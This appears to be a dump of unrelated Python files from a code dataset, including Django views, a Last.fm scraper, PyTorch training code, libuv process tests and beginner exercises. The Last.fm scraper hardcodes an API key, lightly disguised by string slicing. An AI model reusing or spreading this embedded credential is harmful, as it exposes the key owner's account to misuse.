StartHandler), \n ('/result', ResultHandler),\n ('/rank', RankHandler),\n ('/recentgames', RecentGamesHandler),\n ('/cleangames', CleanGamesHandler),\n ('/phone_reg', PhoneRegHandler),\n ('/phone_recent', PhoneRecentHandler),\n ('/help', HelpHandler),\n ('/cellphone', CellPhoneHandler),\n ('/invite', InviteHandler),\n ('/admin', AdminHandler)],\n debug=True)\n util.run_wsgi_app(application)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ZhouWeikuan/DreamHost","sub_path":"games/appspot/goosezh/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12962,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"71262453609","text":"def select_cate(l,c):\n img = []\n for i in xrange(len(l[0])):\n if l[1][i] == c:\n img.append(l[0][i])\n return img\n\nfrom matplotlib import pyplot as plt\ndef show_img(num, data, c):\n l = select_cate(data,c)\n f = plt.figure()\n for i in range(num):\n f.add_subplot(num/5,5,i)\n plt.imshow(l[i], interpolation='nearest', cmap='Greys_r')\n\n plt.show()\n\nimport data_loader\ntrain = data_loader.load_data()\nshow_img(5,train,4)\n","repo_name":"Jerrycjw/Facial_emotion_detect","sub_path":"analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28755493377","text":"#Insertion Sort (iterative)\r\n\r\na=list(map(int,input().split()))\r\n\r\nfor i in range(1,len(a)):\r\n k=a[i] \r\n j=i-1 \r\n\r\n while j>=0 and a[j]>k: \r\n a[j+1]=a[j] \r\n j-=1\r\n a[j+1]=k \r\nprint(\"Sorted Array: \",a)","repo_name":"Poorna525/python-lab1","sub_path":"l12iterativeinsertionsort.py","file_name":"l12iterativeinsertionsort.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36467820222","text":"\"\"\"yoshlar = int(input(\"Yoshingiz nechida? \" ))\r\nif yoshlar < 4:\r\n print(\"Siz uchun bepul\")\r\nelif yoshlar < 12:\r\n print(\"Siz uchun kirish narxi 5 000 so'm\")\r\nelif yoshlar < 18:\r\n print(\"Siz uchun kirish narxi 10 000 so'm\")\r\nelse:\r\n print(\"Siz uchun kirish narxi 15 000 so'm\")\r\n \"\"\"\r\n \r\n \r\n \r\n \r\n\r\n#yoshlar = int(input(\"Yoshingiz nechida? \" ))\r\n#if yoshlar <= 4:\r\n# narh = 0\r\n#elif yoshlar <= 12:\r\n# narh = 5000\r\n#elif yoshlar <= 18:\r\n# narh = 10000\r\n#else:\r\n# narh = 15000\r\n#print(f\"Siz uchun kirish narxi {narh} so'mni tashkil etadi\")\r\n\r\n\r\n#kun = input(\"Bugun qanaqa kun? \")\r\n#if kun.lower()=='shanba' or kun.lower()==\"yakshanba\":\r\n# print(\"Bugun dam olish kuni\")\r\n#else:\r\n# print(\"Bugun ish kuni\")\r\n\r\n\r\n#kun = input(\"Bugun nima kun? \")\r\n#harorat = float(input('Bugun havo harorati nechchi? 
'))\r\n#if kun.lower()==\"shanba\" or 'yakshanba' and harorat >= 30:\r\n# print(\"Qani ketdik cho'milishga\")\r\n#elif kun.lower()==\"shanba\" or 'yakshanba' and harorat <= 30:\r\n# print(\"Uyda qolamiz\")\r\n#elif kun.lower()==\"dushanba\" or 'seshanba' or 'chorshanba' or 'payshanba' or 'juma' and harorat <= 30 or harorat >= 30:\r\n# print(\"Ishga sur\")\r\n#else:\r\n# print('Bilganingni qile')\r\n\r\n#narh = 15000\r\n#salat = True\r\n#choy = False \r\n#if choy and salat:\r\n# narh = narh + 10000\r\n#elif choy or salat:\r\n# narh = narh + 5000\r\n#print(f\"Jami {narh} so'm\")\r\n\r\n#narh = 10000\r\n#salat = True\r\n#non = True\r\n#kompot = False\r\n#assorti = True\r\n#fanta = False\r\n#if salat:\r\n# narh = narh + 7000\r\n#if non:\r\n# narh = narh + 3500\r\n#if kompot:\r\n# narh = narh = 8000\r\n#if assorti:\r\n# narh = narh + 12000\r\n#if fanta:\r\n# narh = narh + 10000\r\n#\r\n#print(f\"Jami {narh} so'm\")\r\n#\r\n\r\n#menu = ['osh', 'manti', 'kabob', 'barak']\r\n#ovqat = input('Nima ovqat yeysiz? ')\r\n#\r\n#if ovqat.lower() in menu:\r\n# print(\"Buyurtma qabul qilindi.\")\r\n#else:\r\n# print(f\"Uzur menuda '{ovqat}' yo'q ekan. \")\r\n\r\n\"\"\"buyurtmalar = ['osh', 'manti', 'kabob', 'barak']\r\nmenu = ['osh', 'manti', 'kabob', 'barak', 'shashlik', 'honim']\r\ntaom = []\r\n#for taom in menu:\r\n# if taom in buyurtmalar:\r\n# print(f\"Menuda {taom} bor\")\r\n# else:\r\n# print(f\"menida {taom} yo'q\")\r\nif buyurtmalar:\r\n print(f\"royxatda {len(buyurtmalar)} ta buyurtma bor.\")\r\nelse:\r\n print(\"royxar bo'sh\")\"\"\"\r\n\r\n#car = {'rangi':'Qizil', 'model':'Ferrari', 'turi':'supercar' }\r\n#print(car['rangi'])\r\n#print(car['model'])\r\n#print(car['turi'])\r\n\r\n#uz_en = {'noutbuk':'laptop', 'olma':'apple', 'mouse':'sichqon'}\r\n#print(uz_en['noutbuk'])\r\n\r\n#talaba_0 = {'ism':'murod olimov','yosh':20,'t_yil':2000}\r\n#talaba_0['kurs'] = 4 # yangi, 'kurs' nomli kalit so'zga 4 qiymatini yuklaymiz\r\n#talaba_0['fakultet'] = 'informatika' # 'fakultet' ga esa 'informatika' \r\n#print(f\"{talaba_0['ism'].title()},\\\r\n#{talaba_0['t_yil']}-yilda tu'gilgan,\\\r\n#{talaba_0['yosh']} yoshda, \\\r\n#{talaba_0['kurs']}-kurs,\\\r\n#{talaba_0['fakultet']} fakulteti\")\r\n \r\n#telefonlar = {\r\n# 'ali':'iphone x',\r\n# 'vali':'galaxy s9',\r\n# 'olim':'mi 10 pro',\r\n# 'orif':'nokia 3310'\r\n# }\r\n#\r\n#phone = telefonlar.get('hasan','Bunday ism mavjud emas')\r\n\r\n#talaba_0 = {\r\n# 'Ism' : 'Ali',\r\n# 'Yosh' : '22',\r\n# 'Manzil' : 'Samarqand'\r\n# }\r\n#\r\n#for kalit, qiymat in talaba_0.items():\r\n# print(f\"Kalit: {kalit}\")\r\n# print(f\"Qiymat: {qiymat} \\n\")\r\n\r\n#telefonlar = {\r\n# 'ali':'iphone x',\r\n# 'vali':'galaxy s9',\r\n# 'olim':'mi 10 pro',\r\n# 'orif':'nokia 3310'\r\n#}\r\n#\r\n#for k, v in telefonlar.items():\r\n# print(f\"{k}ning telefoni: {v}\")\r\n\r\n\r\n#mahsulotlat = {\r\n# 'olma' : 10000,\r\n# 'anor' : 20000,\r\n# 'limon' : 5000,\r\n# 'shaftoli' : 50000\r\n#}\r\n#\r\n#for mahsulot in mahsulotlat.keys():\r\n# print(mahsulot.title())\r\n\r\n#mahsulotlat = {\r\n# 'olma' : 10000,\r\n# 'anor' : 20000,\r\n# 'limon' : 5000,\r\n# 'shaftoli' : 50000\r\n#}\r\n#\r\n#for mahsulot in mahsulotlat.values():\r\n# print(mahsulot)\r\n\r\n\r\ntelefonlar = {\r\n 'ali':'iphone x',\r\n 'vali':'galaxy s9',\r\n 'olim':'mi 10 pro',\r\n 'orif':'nokia 3310',\r\n 'hamida':'galaxy s9',\r\n 'maryam':'huawei p30',\r\n 'tohir':'iphone x',\r\n 'umar':'iphone x' \r\n }\r\n\r\nprint('Foydalanuvchilar quyidagi telefonlarni ishlatishadi:')\r\nfor tel in set(telefonlar.values()):\r\n 
print(tel)","repo_name":"YupBekha/lessons","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14534579794","text":"\"\"\"\nSolves for advent of code 20211201\n\"\"\"\nimport os\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\nINPUT = []\n\nwith open(os.path.join(SCRIPT_DIR, \"input.txt\"), \"r\") as file:\n for line in file:\n INPUT.append(int(line.strip('\\n')))\n\nprint('Processed ' + str(len(INPUT)) + ' instructions')\n\nDEEPER_COUNT = -1\nPREV_DEPTH = 0\nfor depth in INPUT:\n if depth > PREV_DEPTH:\n DEEPER_COUNT += 1\n PREV_DEPTH = depth\n\nprint('Found ' + str(DEEPER_COUNT) + ' deeper depths')\n\nDEEPER_COUNT = -1\nINPT_INDEX = 0\nPREV_DEPTH = 0\nwhile INPT_INDEX <= len(INPUT) - 3:\n if (INPUT[INPT_INDEX] + INPUT[INPT_INDEX + 1] + INPUT[INPT_INDEX + 2]) > PREV_DEPTH:\n DEEPER_COUNT += 1\n PREV_DEPTH = INPUT[INPT_INDEX] + INPUT[INPT_INDEX + 1] + INPUT[INPT_INDEX + 2]\n INPT_INDEX += 1\n\nprint('Found ' + str(DEEPER_COUNT) + ' deeper depths')\n","repo_name":"jtmach/AdventOfCode2019","sub_path":"20211201/20211201.py","file_name":"20211201.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34909140070","text":"# from django.contrib.sites import requests\nimport requests\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework import status, generics, views\nfrom rest_framework.response import Response\nfrom rest_framework.reverse import reverse\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom rest_framework.views import APIView\nfrom djoser.conf import django_settings\nfrom django.utils.crypto import get_random_string\n\nfrom .models import User, LogInfo\n\n\n# Create your views here.\nfrom .serializers import CurrentUserSerializer, LogInfoSerializer\n\n\n@api_view(['GET'])\ndef restricted(request, *args, **kwargs):\n return Response(data='Only for logged-in users', status=status.HTTP_200_OK)\n\n\n# class UserActivationView(APIView):\n# def get(self, request, uid, token):\n# protocol = 'https://' if request.is_secure() else 'http://'\n# web_url = protocol + request.get_host()\n# post_url = web_url + \"/auth/users/activate/\"\n# post_data = {'uid': uid, 'token': token}\n# result = requests.post(post_url, data = post_data)\n# content = result.text()\n# return Response(content)\n\n\n# class ActivateUser(GenericAPIView):\n#\n# def get(self, request, uid, token, format=None):\n# payload = {'uid': uid, 'token': token}\n# protocol = 'https://' if request.is_secure() else 'http://'\n# domain = request.get_host()\n# url = f\"{protocol}{domain}/auth/users/activation/\"\n# response = requests.post(url, data=payload)\n#\n# if response.status_code == 204:\n# return Response({}, response.status_code)\n# else:\n# return Response(response.json())\n\n\nclass PasswordReset(GenericAPIView):\n\n def get(self, request, uid, token, format=None):\n payload = {'uid': uid, 'token': token}\n\n return JsonResponse(payload)\n\n\n@api_view(['GET', ])\ndef add_log_info(request):\n \"\"\" Created a new session code \"\"\"\n\n if request.method == 'GET':\n code = get_random_string(length=12)\n while 
LogInfo.objects.filter(code=code).first():\n code = get_random_string(length=12)\n save_log(request, code)\n return Response(data=code, status=status.HTTP_200_OK)\n\n\ndef save_log(request, code):\n device = ''\n ip = get_client_ip(request)\n print(ip)\n if request.user_agent.is_mobile:\n device = 'Mobile'\n elif request.user_agent.is_tablet:\n device = 'Tablet'\n elif request.user_agent.is_pc:\n device = 'PC'\n elif request.user_agent.is_bot:\n device = \"Bot\"\n\n if request.user_agent.is_touch_capable:\n device += '-Touch'\n if request.user.is_anonymous:\n current_user = None\n else:\n current_user = request.user\n device_family = request.user_agent.device.family # returns 'iPhone'\n print(request.user_agent)\n browser = request.user_agent.browser.family # returns 'Mobile Safari'\n operating_system = f'{request.user_agent.os.family}({request.user_agent.os.version_string})'\n new_log = LogInfo(code=code, device=device, device_family=device_family,\n browser=browser, operating_system=operating_system, user=current_user, ip=ip)\n new_log.save()\n\n\ndef get_client_ip(request):\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n print(x_forwarded_for)\n print(request.META)\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n return ip","repo_name":"walidzakaria/dao-clinic","sub_path":"apps/authapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71256421927","text":"from model import CharacterGenerator\nfrom app import schema_data\nfrom helper import LabelJson, pool_queue\n\n\nasync def request_data(queue):\n await pool_queue(queue=queue, _class=CharacterGenerator())\n task = await queue.get()\n data = schema_data()\n file_json = LabelJson()\n\n if data.get('npc', False):\n npc = task.character('npc')\n lobby = npc.npc_begin(data['type_loby'], data['name_npc'])\n await file_json.mk_file_json(lobby.__str__())\n\n elif data.get('player', False):\n player = task.character('player')\n lobby = player.player_begin(data['race_player'], data['class_player'])\n await file_json.mk_file_json(lobby.__str__())\n","repo_name":"HugoItaloMC/pyac","sub_path":"geek_university/async_python/tests/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1179291942","text":"import requests\nimport json\nimport pandas as pd\nimport xlsxwriter\nimport time\nimport os\n\ndef load_data_from_excel(csv_input):\n request_query = []\n req = {}\n data = pd.read_excel(r''+csv_input)\n if 'Title' in data and 'Artist' in data:\n data = data.rename(columns={'Title': 'title', 'Artist': 'artist'})\n df = pd.DataFrame(data, columns=['title', 'artist'])\n # print(df)\n for index, row in df.iterrows():\n req['method'] = 'track.getInfo'\n req['autocorrect'] = 1\n req['track'] = row['title'][1:-1]\n req['artist'] = row['artist']\n request_query.append(req)\n req = {}\n return request_query\n\n\ndef convert(millis):\n # millis = int(millis)\n seconds = (millis / 1000) % 60\n seconds = int(seconds)\n minutes = (millis / (1000 * 60)) % 60\n minutes = int(minutes)\n # hours = (millis / (1000 * 60 * 60)) % 24\n return (\"%02d:%02d\" % (minutes, seconds))\n # seconds = seconds % (24 * 3600)\n # hour = seconds // 3600\n # seconds %= 3600\n # minutes = seconds // 60\n # seconds %= 60\n # return \"%d:%02d:%02d\" % 
(hour, minutes, seconds)\n\n\ndef count_listeners(data_json):\n # print(jprint(data_json))\n out_p = {}\n if 'track' in data_json:\n count = data_json['track']['playcount']\n listener = data_json['track']['listeners']\n duration = convert(int(data_json['track']['duration']))\n # for each in data_json['track']['playcount']['track']:\n # count = count + int(each['listeners'])\n # # print(each['listeners'], each['name'])\n # print('count is', count, \"listener is\", listener, 'duration is', duration)\n out_p['playcount'] = int(count)\n out_p['listeners'] = int(listener)\n out_p['duration'] = duration\n else:\n # print(\"not found\")\n out_p['playcount'] = -1\n out_p['listeners'] = -1\n out_p['duration'] = -1\n return out_p\n\ndef lastfm_get(payload):\n ys = 'ca791ebdea3b7ba81ff4bd70cff59124423'\n ys=ys[1:-2]\n USER_AGENT = 'law-school-copyright'\n # define headers and URL\n headers = {'user-agent': USER_AGENT}\n url = 'http://ws.audioscrobbler.com/2.0/'\n\n # Add API key and format to the payload\n payload['api_key'] = ys\n payload['format'] = 'json'\n\n response = requests.get(url, headers=headers, params=payload)\n # print(payload['artist'], payload['track'])\n text = response.json()\n out_dict = count_listeners(text)\n return out_dict\n\n\ndef jprint(obj):\n # create a formatted string of the Python JSON object\n text = json.dumps(obj, sort_keys=True, indent=4)\n return text\n\n\ndef perform_last_fm(data, current_finished_count,total_records):\n if 'Title' in data and 'Artist' in data:\n data = data.rename(columns={'Title': 'title', 'Artist': 'artist'})\n df = pd.DataFrame(data, columns=['title', 'artist'])\n # print(df)\n request_query = []\n req = {}\n for index, row in df.iterrows():\n req['method'] = 'track.getInfo'\n req['autocorrect'] = 1\n # print('track,', row['title'])\n req['track'] = row['title'][1:-1]\n req['artist'] = row['artist']\n request_query.append(req)\n req = {}\n out_query = []\n out_dict = {}\n i = 0\n for each in request_query:\n out_dict['artist'] = each['artist']\n out_dict['track'] = each['track']\n # print(each)\n max_retry=10\n current_retry=0\n is_api_success=False\n while not is_api_success and current_retry {}'.format(k, v))\n for k, v in filter_errs:\n os.system('rm -rf {}'.format(v))\n print('[delete] old params {} --> {}'.format(k, v))\n\n\n wirter.close()","repo_name":"ustcylw/FL_v1.0","sub_path":"train_v1.py","file_name":"train_v1.py","file_ext":"py","file_size_in_byte":9305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34308904184","text":"class Personaje:\n def __init__(self, name, status, species, gender, img, location):\n self.name = name\n self.status = status\n self.species = species\n self.gender = gender\n self.img = img\n self.location = location\n \n def to_json(self):\n return {\n 'name': self.name,\n 'status': self.status,\n 'species': self.species,\n 'gender': self.gender,\n 'img': self.img,\n 'location': self.location\n }","repo_name":"LilXhan/new-flask","sub_path":"app/models/personaje.py","file_name":"personaje.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19319040698","text":"# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append('.')\nfrom common import TestCase\nimport unittest\nimport fatuv as uv\nimport os\nfrom _fatcore import lib\nimport json\n\n\n__dir__ = os.path.dirname(os.path.realpath(__file__))\n\ndef resolve_path(relative_path):\n\treturn 
os.path.join(__dir__, 'data', relative_path)\n\nPROGRAM_HELLO = resolve_path('program_hello.py')\nPROGRAM_ENDLESS_LOOP = resolve_path('program_endless_loop.py')\nPROGRAM_DUMP_ENV = resolve_path('program_dump_env.py')\n\nTEST_PIPE1 = '/tmp/python-uv-test1'\n\nclass TestProcess(TestCase):\n\tdef test_process_hello(self):\n\t\targuments = [sys.executable, PROGRAM_HELLO]\n\t\tself.buffer = b''\n\t\tself.returncode = None\n\n\t\tdef on_exit(process_handle, returncode, term_signal):\n\t\t\tself.returncode = returncode\n\n\t\tdef on_read(pipe_handle,data,status):\n\t\t\tif data:\n\t\t\t\tself.buffer += data\n\n\t\tself.pipe = uv.Pipe(self.loop)\n\t\tself.pipe.bind(TEST_PIPE1)\n\n\t\tself.process = uv.Process(self.loop, arguments, stdout=uv.process.PIPE, stdio=[self.pipe],\n\t\t\t\t\t\t\t\t callback=on_exit)\n\t\tself.process.stdout.start_read(on_read)\n\n\t\tself.loop.run()\n\n\t\tself.assert_equal(self.buffer.strip(), b'hello')\n\t\tself.assert_equal(self.returncode, 1)\n\t\tself.assert_not_equal(self.process.pid, None)\n\t\tself.assert_raises(uv.error.UVError, self.process.kill)\n\n\t\tself.process.close()\n\n\t\tself.assert_raises(uv.HandleClosedError, self.process.kill)\n\t\twith self.should_raise(uv.HandleClosedError):\n\t\t\tpid = self.process.pid\n\n\tdef test_process_endless_loop(self):\n\t\targuments = [sys.executable, PROGRAM_ENDLESS_LOOP]\n\n\t\tself.returncode = None\n\t\tself.term_signal = None\n\n\t\tdef on_exit(process_handle, returncode, term_signal):\n\t\t\tself.returncode = returncode\n\t\t\tself.term_signal = term_signal\n\n\t\tdef on_prepare(prepare_handle):\n\t\t\tprepare_handle.close()\n\t\t\tself.process.kill()\n\n\t\tself.process = uv.Process(self.loop, arguments, callback=on_exit)\n\t\tself.prepare = uv.Prepare(self.loop)\n\t\tself.prepare.start(on_prepare)\n\n\t\tself.loop.run()\n\n\t\tself.assert_is_not(self.returncode, None)\n\t\tself.assert_is_not(self.term_signal, None)\n\n\tdef test_process_dump_env(self):\n\t\targuments = [sys.executable, PROGRAM_DUMP_ENV]\n\t\tprint(PROGRAM_DUMP_ENV)\n\t\tself.buffer = b''\n\t\tself.returncode = None\n\n\t\tdef on_exit(process_handle, returncode, term_signal):\n\t\t\tself.returncode = returncode\n\n\t\tdef on_read(pipe_handle, data, nread):\n\t\t\tif nread > 0:\n\t\t\t\tself.buffer += data\n\n\t\tenv = {'hello': 'world'}\n\t\tself.process = uv.Process(self.loop, arguments, env=env, stdout=uv.process.PIPE, callback=on_exit,\n\t\t\t\t\t\t\t\t cwd=resolve_path(''))\n\t\tself.process.stdout.start_read(on_read)\n\n\t\tself.loop.run()\n\n\t\tself.assert_equal(self.returncode, 0)\n\t\tself.assert_not_equal(self.process.pid, None)\n\n\t\tresult = json.loads(self.buffer.decode())\n\t\tself.assert_equal(result['hello'], 'world')\n\t\tself.assert_true(result['cwd'].endswith('tests/data'))\n\n\tdef test_unknown_file(self):\n\t\targuments = [sys.executable, PROGRAM_HELLO]\n\t\tself.assert_raises(uv.error.ArgumentError, uv.Process, self.loop, arguments, stdout='abc')\n\nif __name__ == '__main__':\n\tunittest.main(verbosity=2)\n","repo_name":"kasicass/fatuv","sub_path":"tests/test_process.py","file_name":"test_process.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"15633780979","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nfrom xml.sax import make_parser\nfrom xml.sax.handler import ContentHandler\nfrom smallsmilhandler import SmallSMILLHandler\nfrom urllib.request import urlretrieve\nimport sys\nimport json\n\nclass 
KaraokeLocal():\n def __init__(self, filename):\n parser = make_parser()\n SmallSmill = SmallSMILLHandler()\n parser.setContentHandler(SmallSmill)\n parser.parse(open(filename))\n self.lista = SmallSmill.get_tags()\n\n def __str__(self):\n output = \"\"\n for elementDicc in self.lista:\n output += elementDicc['etiqueta'] + '\\t'\n for atributo in elementDicc:\n if atributo != \"etiqueta\" and elementDicc[atributo]:\n output += atributo + \"=\" + elementDicc[atributo] + \"\\t\"\n output = output[:-1] + '\\n'\n return output\n\n def to_json(self, filejson):\n if filejson.endswith(\".smil\"):\n filejson = filejson.replace(\".smil\",\".json\")\n\n with open(filejson, \"w\") as outfile:\n json.dump(self.lista, outfile, indent=1)\n\n def dolocal(self):\n for elemento in self.lista:\n for atributo in elemento:\n if atributo != \"etiqueta\":\n if elemento[atributo].startswith(\"http://\"):\n url = elemento[atributo]\n Download = url.split(\"/\")[-1]\n urlretrieve(url,Download)\n print(\"Descargando... \" + elemento[atributo])\n elemento[atributo] = elemento[atributo].split(\"/\")[-1]\n\nif __name__ == '__main__':\n\n if len(sys.argv) != 2:\n sys.exit(\"ussage karaoke.py karaoke.smill\")\n else:\n try:\n filename = sys.argv[1]\n filejson = \"local.json\"\n Karaoke = KaraokeLocal(filename)\n print(Karaoke)\n Karaoke.to_json(filename)\n Karaoke.dolocal()\n Karaoke.to_json(filejson)\n print(Karaoke)\n except FileNotFoundError:\n print(\"File has to exist\")\n except IndexError:\n print(\"Ussage karaoke.py file.smil\")\n","repo_name":"ediezbl/PTAVI","sub_path":"ptavi-p3/karaoke2.py","file_name":"karaoke2.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17809412697","text":"import pandas as pd\nimport numpy as np\nimport sqlite3\nimport itertools\nfrom scipy.sparse import csr_matrix\nfrom sklearn.cluster import KMeans, AgglomerativeClustering\nfrom sklearn.mixture import GaussianMixture\nfrom sklearn.metrics import silhouette_samples, silhouette_score, mean_squared_error\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom api.models import Movie, Profile, Rating, Clustering\nfrom api.serializers import MovieSerializer, ClusteringSerializer\nfrom rest_framework.response import Response\nfrom django.db import connection\nfrom django.forms import model_to_dict\n\n\n@api_view(['GET','POST'])\ndef recommend(request):\n\n if request.method == 'GET':\n user_id = request.GET.get('id', None)\n movies = pd.DataFrame(list(Movie.objects.all().values('id','title'))) \n movies.columns = ['movieid', 'title']\n ratings = pd.DataFrame(list(Rating.objects.all().values('userid','movieid','rating')))\n ratings_title = pd.merge(ratings, movies[['movieid', 'title']], on='movieid' )\n\n user_movie_ratings = pd.pivot_table(ratings_title, index='userid', columns= 'title', values='rating')\n user_movie_ratings = user_movie_ratings.reset_index()\n clusters = pd.DataFrame(list(Clustering.objects.all().values('group'))) \n clustered = pd.concat([user_movie_ratings, clusters], axis=1)\n\n cluster = Clustering.objects.all().filter(id = user_id)\n cluster_number = cluster[0].group\n \n # 같은 클러스터 부르기\n cluster = clustered[clustered.group == cluster_number].drop(['group'], axis=1)\n print(cluster)\n # 유저의 ratings을 다 가져온다.\n user_2_ratings = cluster.loc[int(user_id), :]\n # 유저가 보지 않은 영화를 가져온다.\n user_2_unrated_movies = user_2_ratings[user_2_ratings.isnull()]\n # 그 영화의 다른 유저들의 평균을 가져온다\n 
avg_ratings = pd.concat([user_2_unrated_movies, cluster.mean()], axis=1, join='inner').loc[:,0]\n print(avg_ratings)\n # 정렬 5개\n avg_ratings = avg_ratings.sort_values(ascending=False)[:6]\n movies = avg_ratings.index\n cnt = 0\n recommend_movies = Movie.objects.all().filter(id=-1)\n for movie in movies:\n print(movie)\n cnt+=1\n m = Movie.objects.all().filter(title = movie)\n recommend_movies = recommend_movies.union(m)\n\n serializer = MovieSerializer(recommend_movies, many=True)\n \n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n\n ## 포스트 하면 db.sqlite3에 있는 것 클러스터링 정보 갱신 \n if request.method == 'POST':\n\n cluster = request.data[\"params\"]\n cluster_type = cluster[\"cluster\"]\n # 클러스터 수\n cluster_n = cluster[\"number\"]\n\n movies = pd.DataFrame(list(Movie.objects.all().values('id','title'))) \n movies.columns = ['movieid', 'title']\n ratings = pd.DataFrame(list(Rating.objects.all().values('userid','movieid','rating')))\n ratings_title = pd.merge(ratings, movies[['movieid', 'title']], on='movieid' )\n ##가장 값이 많은 상위 1000개 데이터만 가져온다\n user_movie_ratings = pd.pivot_table(ratings_title, index='userid', columns= 'title', values='rating')\n #most_rated_movies_1k = get_most_rated_movies(user_movie_ratings, 1000)\n #sparse_ratings = csr_matrix(pd.SparseDataFrame(most_rated_movies_1k).to_coo())\n sparse_ratings = csr_matrix(pd.SparseDataFrame(user_movie_ratings).to_coo())\n clustering = \"\"\n # 클러스터링\n print(sparse_ratings)\n con = sqlite3.connect(\"db.sqlite3\")\n if cluster_type :\n if cluster_type == 1 :\n clustering = KMeans(n_clusters=cluster_n, algorithm='full').fit_predict(sparse_ratings)\n if cluster_type == 2 :\n clustering = AgglomerativeClustering(n_clusters=cluster_n, linkage='ward').fit_predict(sparse_ratings.toarray())\n if cluster_type == 3 : \n clustering = GaussianMixture(n_components=cluster_n, covariance_type=\"full\").fit_predict(sparse_ratings.toarray())\n \n \n clustered = pd.concat([user_movie_ratings.reset_index(), pd.DataFrame({'group':clustering})], axis=1)\n clustered = clustered[['userid','group']]\n print(clustered)\n clustered = clustered.fillna('')\n\n clustered.to_sql('cluster', con, if_exists=\"replace\")\n con.close()\n \n '''\n kmeans = KMeans(n_clusters=cluster_n, algorithm='full').fit_predict(sparse_ratings)\n Hierarchical = AgglomerativeClustering(n_clusters=cluster_n, linkage='ward').fit_predict(sparse_ratings.toarray())\n EM = GaussianMixture(n_components=cluster_n, covariance_type=\"full\").fit_predict(sparse_ratings.toarray())\n \n clusters = [kmeans,Hierarchical,EM]\n clustersStr = ['kmeans','Hierarchical','EM']\n\n # db에 저장\n con = sqlite3.connect(\"db.sqlite3\")\n for i in range(0,3):\n clustered = pd.concat([most_rated_movies_1k.reset_index(), pd.DataFrame({'group':clusters[i]})], axis=1)\n clustered = clustered.fillna('')\n clustered.to_sql(clustersStr[i], con, if_exists=\"replace\")\n con.close()\n '''\n con = sqlite3.connect(\"db.sqlite3\")\n cur = con.cursor()\n serializer = ''\n if cluster :\n cur.execute(\"select * from cluster\")\n\n rows = cur.fetchall()\n cnt = 0\n for row in rows:\n if(cnt == len(rows)-1):\n break\n userid = int(row[1])\n group = int(row[-1])\n profile = list(Profile.objects.filter(user_id = userid).values())\n print(profile[0])\n print(profile[0]['user_id'])\n\n Clustering(id = int(profile[0]['user_id']),occupation=profile[0]['occupation'], gender=profile[0]['gender'],age=int(profile[0]['age']),group=group ).save()\n cnt = cnt+1\n clusters = Clustering.objects.all()\n con.close()\n serializer = 
ClusteringSerializer(clusters, many=True)\n \n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\ndef clustering_errors(k, data):\n kmeans = KMeans(n_clusters=k).fit(data)\n predictions = kmeans.predict(data)\n silhouette_avg = silhouette_score(data, predictions)\n return silhouette_avg\n\ndef sparse_clustering_errors(k, data):\n kmeans = KMeans(n_clusters=k).fit(data)\n predictions = kmeans.predict(data)\n cluster_centers = kmeans.cluster_centers_\n errors = [mean_squared_error(row, cluster_centers[cluster]) for row, cluster in zip(data, predictions)]\n return sum(errors)\n\ndef get_most_rated_movies(user_movie_ratings, max_number_of_movies):\n # 1- Count\n user_movie_ratings = user_movie_ratings.append(user_movie_ratings.count(), ignore_index=True)\n # 2- sort\n user_movie_ratings_sorted = user_movie_ratings.sort_values(len(user_movie_ratings)-1, axis=1, ascending=False)\n user_movie_ratings_sorted = user_movie_ratings_sorted.drop(user_movie_ratings_sorted.tail(1).index)\n # 3- slice\n most_rated_movies = user_movie_ratings_sorted.iloc[:, :max_number_of_movies]\n return most_rated_movies\n\ndef get_users_who_rate_the_most(most_rated_movies, max_number_of_movies):\n # Get most voting users\n # 1- Count\n most_rated_movies['counts'] = pd.Series(most_rated_movies.count(axis=1))\n # 2- Sort\n most_rated_movies_users = most_rated_movies.sort_values('counts', ascending=False)\n # 3- Slice\n most_rated_movies_users_selection = most_rated_movies_users.iloc[:max_number_of_movies, :]\n most_rated_movies_users_selection = most_rated_movies_users_selection.drop(['counts'], axis=1)\n \n return most_rated_movies_users_selection\n\ndef sort_by_rating_density(user_movie_ratings, n_movies, n_users):\n most_rated_movies = get_most_rated_movies(user_movie_ratings, n_movies)\n most_rated_movies = 